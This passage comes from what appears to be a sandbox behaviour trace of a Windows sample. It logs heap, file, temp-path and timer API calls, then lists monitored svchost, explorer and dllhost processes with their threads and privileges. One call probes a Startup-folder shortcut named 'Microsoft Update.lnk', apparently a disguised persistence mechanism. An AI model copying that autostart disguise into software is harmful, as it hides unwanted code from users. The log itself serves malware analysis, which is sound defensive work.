lpMem=0x2aab5c0 | out: hHeap=0x2af0000) returned 1 [0264.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0264.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f7140 [0264.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab560 [0264.464] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x190) returned 0x50e0048 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a683a8 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7140 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0264.464] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.465] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup/Microsoft Update.lnk" (normalized: "c:\\users\\fd1hvy\\appdata\\roaming\\microsoft\\windows\\start menu\\programs\\startup\\microsoft update.lnk")) returned 0x20 [0264.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x50e0048 | out: hHeap=0x2af0000) returned 1 [0264.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721a8 | out: hHeap=0x2af0000) returned 1 [0264.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab500 | out: hHeap=0x2af0000) returned 1 [0264.643] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab698 | out: hHeap=0x2af0000) returned 1 [0264.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72228 | out: hHeap=0x2af0000) returned 1 [0264.646] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.646] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5e800 [0264.647] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.647] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5e800 | out: hHeap=0x2af0000) returned 1 [0264.647] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0264.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab4e8 [0264.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.648] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72218 [0264.650] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab590 [0264.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0264.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0264.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab620 | out: hHeap=0x2af0000) returned 1 [0264.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab4e8 | out: hHeap=0x2af0000) returned 1 [0264.650] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0264.650] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72238 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab620 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab638 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab650 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab6e0 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72368 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aab710 [0264.651] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72368 | out: hHeap=0x2af0000) returned 1 [0264.651] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0xca) returned 0x29f7878 [0264.652] CharUpperBuffW (in: lpsz="tempdir", cchLength=0x7 | out: lpsz="TEMPDIR") returned 0x7 [0264.652] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab590 | out: hHeap=0x2af0000) returned 1 [0264.652] GetTempPathW (in: nBufferLength=0x104, lpBuffer=0x8cf298 | out: lpBuffer="C:\\Users\\FD1HVy\\AppData\\Local\\Temp\\") returned 0x23 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72348 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab458 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab560 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab578 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab530 | out: hHeap=0x2af0000) returned 1 [0264.653] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aab710 | out: hHeap=0x2af0000) returned 1 [0264.653] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Temp/8x8x8" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\temp\\8x8x8")) returned 0x20 [0264.764] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0264.764] TranslateMessage (lpMsg=0x8cf968) returned 0 [0264.764] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0264.765] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0264.765] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0264.765] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0264.766] timeGetTime () returned 0x1181fa4 [0264.766] PeekMessageW (in: lpMsg=0x8cf798, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf798) returned 0 [0264.767] Sleep (dwMilliseconds=0xa) Thread: id = 58 os_tid = 0x4d8 Thread: id = 60 os_tid = 0x1234 Thread: id = 61 os_tid = 0xf0c Thread: id = 69 os_tid = 0x13cc Thread: id = 70 os_tid = 0x13b4 Thread: id = 71 os_tid = 0xdfc Thread: id = 72 os_tid = 0xde0 Thread: id = 198 os_tid = 0x12f4 Thread: id = 199 os_tid = 0xb10 Thread: id = 200 os_tid = 0x12ec Process: id = "10" image_name = "svchost.exe" filename = "c:\\windows\\system32\\svchost.exe" page_root = "0x50f56000" os_pid = "0x314" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "8" os_parent_pid = "0x23c" cmd_line = "C:\\WINDOWS\\system32\\svchost.exe -k LocalService" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NT AUTHORITY\\Local Service" bitness = "32" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\bthserv" [0xa], "NT SERVICE\\CDPSvc" [0xa], "NT SERVICE\\EventSystem" [0xa], "NT SERVICE\\FontCache" [0xa], "NT SERVICE\\LicenseManager" [0xa], "NT SERVICE\\lltdsvc" [0xa], "NT SERVICE\\netprofm" [0xa], "NT SERVICE\\nsi" [0xe], "NT SERVICE\\PhoneSvc" [0xa], "NT SERVICE\\RemoteRegistry" [0xa], "S-1-5-80-2226967063-754826275-1661302337-2802353169-2369347280" [0xa], "NT SERVICE\\SstpSvc" [0xa], "NT SERVICE\\tzautoupdate" [0xa], "NT SERVICE\\W32Time" [0xa], "NT SERVICE\\WdiServiceHost" [0xa], "NT SERVICE\\WebClient" [0xa], "NT SERVICE\\WinHttpAutoProxySvc" [0xa], "S-1-5-80-3916113136-2435487254-2535488001-4050622930-2364918814" [0xa], "NT SERVICE\\workfolderssvc" [0xa], "NT AUTHORITY\\Logon Session 00000000:0000ae93" [0xc000000f], "LOCAL" [0x7] Thread: id = 73 os_tid = 0x133c Thread: id = 74 os_tid = 0xfc4 Thread: id = 75 os_tid = 0xcd0 Thread: id = 76 os_tid = 0xcb8 Thread: id = 77 os_tid = 0xcb4 Thread: id = 78 os_tid = 0xcb0 Thread: id = 79 os_tid = 0xcac Thread: id = 80 os_tid = 0xca8 Thread: id = 81 os_tid = 0xca4 Thread: id = 82 os_tid = 0xca0 Thread: id = 83 os_tid = 0xc9c Thread: id = 84 os_tid = 0x528 Thread: id = 85 os_tid = 0x7a4 Thread: id = 86 os_tid = 0xa18 Thread: id = 87 os_tid = 0x884 Thread: id = 88 os_tid = 0x9e8 Thread: id = 89 os_tid = 0x9ac Thread: id = 90 os_tid = 0x9a8 Thread: id = 91 os_tid = 0x8bc Thread: id = 92 os_tid = 0x6f8 Thread: id = 93 os_tid = 0x550 Thread: id = 94 os_tid = 0x4dc Thread: id = 95 os_tid = 0x4d0 Thread: id = 96 os_tid = 0x4cc Thread: id = 97 os_tid = 0x4b4 Thread: id = 98 os_tid = 0x4b0 Thread: id = 99 os_tid = 0x4ac Thread: id = 100 os_tid = 0x4a0 Thread: id = 101 os_tid = 0x498 Thread: id = 102 os_tid = 0x488 Thread: id = 103 os_tid = 0x484 Thread: id = 104 os_tid = 0x44c Thread: id = 105 os_tid = 0x42c Thread: id = 106 os_tid = 0x428 Thread: id = 107 os_tid = 0x33c Thread: id = 110 os_tid = 0x1150 Thread: id = 111 os_tid = 0xe90 Thread: id = 203 os_tid = 0xd80 Thread: id = 204 os_tid = 0x168 Thread: id = 205 os_tid = 0xa4c Process: id = "11" image_name = "explorer.exe" filename = "c:\\windows\\explorer.exe" page_root = "0x4b61c000" os_pid = "0x7d0" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "9" os_parent_pid = "0xffffffffffffffff" cmd_line = "C:\\WINDOWS\\Explorer.EXE" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 112 os_tid = 0xa78 Thread: id = 113 os_tid = 0xfdc Thread: id = 114 os_tid = 0xd44 Thread: id = 115 os_tid = 0xcc4 Thread: id = 116 os_tid = 0xc98 Thread: id = 117 os_tid = 0xc90 Thread: id = 118 os_tid = 0xc8c Thread: id = 119 os_tid = 0xc88 Thread: id = 120 os_tid = 0xc84 Thread: id = 121 os_tid = 0xc80 Thread: id = 122 os_tid = 0xc74 Thread: id = 123 os_tid = 0xc6c Thread: id = 124 os_tid = 0xc60 Thread: id = 125 os_tid = 0xc5c Thread: id = 126 os_tid = 0xc58 Thread: id = 127 os_tid = 0xc54 Thread: id = 128 os_tid = 0xc50 Thread: id = 129 os_tid = 0xc4c Thread: id = 130 os_tid = 0xc48 Thread: id = 131 os_tid = 0xc44 Thread: id = 132 os_tid = 0xc40 Thread: id = 133 os_tid = 0xc08 Thread: id = 134 os_tid = 0x6cc Thread: id = 135 os_tid = 0xabc Thread: id = 136 os_tid = 0xaa4 Thread: id = 137 os_tid = 0xaa0 Thread: id = 138 os_tid = 0xa9c Thread: id = 139 os_tid = 0xa98 Thread: id = 140 os_tid = 0xa94 Thread: id = 141 os_tid = 0xa90 Thread: id = 142 os_tid = 0xa8c Thread: id = 143 os_tid = 0xa88 Thread: id = 144 os_tid = 0xa84 Thread: id = 145 os_tid = 0xa80 Thread: id = 146 os_tid = 0xa7c Thread: id = 147 os_tid = 0xa74 Thread: id = 148 os_tid = 0xa6c Thread: id = 149 os_tid = 0xa50 Thread: id = 150 os_tid = 0xa18 Thread: id = 151 os_tid = 0xa04 Thread: id = 152 os_tid = 0xa00 Thread: id = 153 os_tid = 0x9fc Thread: id = 154 os_tid = 0x9e4 Thread: id = 155 os_tid = 0x9e0 Thread: id = 156 os_tid = 0x9dc Thread: id = 157 os_tid = 0x890 Thread: id = 158 os_tid = 0x87c Thread: id = 159 os_tid = 0x86c Thread: id = 160 os_tid = 0x834 Thread: id = 161 os_tid = 0x81c Thread: id = 162 os_tid = 0x818 Thread: id = 163 os_tid = 0x814 Thread: id = 164 os_tid = 0x810 Thread: id = 165 os_tid = 0x80c Thread: id = 166 os_tid = 0x808 Thread: id = 167 os_tid = 0x61c Thread: id = 168 os_tid = 0x784 Thread: id = 169 os_tid = 0x418 Thread: id = 170 os_tid = 0x638 Thread: id = 171 os_tid = 0x768 Thread: id = 172 os_tid = 0x74c Thread: id = 173 os_tid = 0x7d4 Thread: id = 201 os_tid = 0xde4 Thread: id = 202 os_tid = 0x1130 Process: id = "12" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x19469000" os_pid = "0xd98" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 174 os_tid = 0x380 Thread: id = 175 os_tid = 0x15c Thread: id = 176 os_tid = 0xb9c Thread: id = 177 os_tid = 0x6bc Thread: id = 178 os_tid = 0x1ec Thread: id = 179 os_tid = 0xe08 Thread: id = 180 os_tid = 0xa10 Thread: id = 181 os_tid = 0xbc0 Thread: id = 182 os_tid = 0xbdc Thread: id = 183 os_tid = 0x1324 Thread: id = 184 os_tid = 0x12e0 Thread: id = 185 os_tid = 0xebc Process: id = "13" image_name = "dllhost.exe" filename = "c:\\windows\\system32\\dllhost.exe" page_root = "0x176ec000" os_pid = "0x25c" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x2a4" cmd_line = "C:\\WINDOWS\\system32\\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}" cur_dir = "C:\\WINDOWS\\system32\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0001086c" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 186 os_tid = 0x4ec Thread: id = 187 os_tid = 0x360 Thread: id = 188 os_tid = 0x1308 Thread: id = 189 os_tid = 0x1378 Thread: id = 190 os_tid = 0x1334 Thread: id = 191 os_tid = 0xe8c Thread: id = 192 os_tid = 0x131c Thread: id = 193 os_tid = 0x19c Thread: id = 194 os_tid = 0x11ec Thread: id = 195 os_tid = 0x11e8 Thread: id = 196 os_tid = 0x11c4 Thread: id = 197 os_tid = 0x3d0